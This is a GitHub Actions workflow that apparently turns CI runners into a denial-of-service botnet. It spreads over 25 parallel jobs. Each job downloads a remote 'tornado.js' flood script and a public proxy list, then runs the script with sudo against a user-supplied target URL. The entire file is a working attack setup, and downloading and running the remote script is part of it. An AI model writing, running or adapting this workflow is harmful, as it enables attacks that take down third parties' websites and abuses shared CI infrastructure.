name: Tornado !

on:
  workflow_dispatch:
    inputs:
      target:
        description: "Site !"
        required: true
        default: "http://127.0.0.1/"

jobs:
  vds:
    runs-on: ubuntu-latest
    strategy:
      max-parallel: 25
      matrix:
        instance: [1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25]

    steps:
      - name: Checkout (optional)
        uses: actions/checkout@v4

      - name: OK !
        run: |
          TARGET="${{ inputs.target }}"

          wget https://github.com/kaneious/tornado/raw/refs/heads/main/tornado.js -O Tornado.js
          wget https://raw.githubusercontent.com/TheSpeedX/PROXY-List/refs/heads/master/http.txt
          npm i hpack
          chmod +x Tornado.js || true

          PIDS=()
          for i in {1..2}; do
            sudo timeout 30 node Tornado.js GET "$TARGET" 30 4 64 http.txt --full --query 3 &
            PIDS+=($!)
          done

          for pid in "${PIDS[@]}"; do
            wait $pid
          done

      - name: Finish !
        run: |
          sleep 30
          exit 0
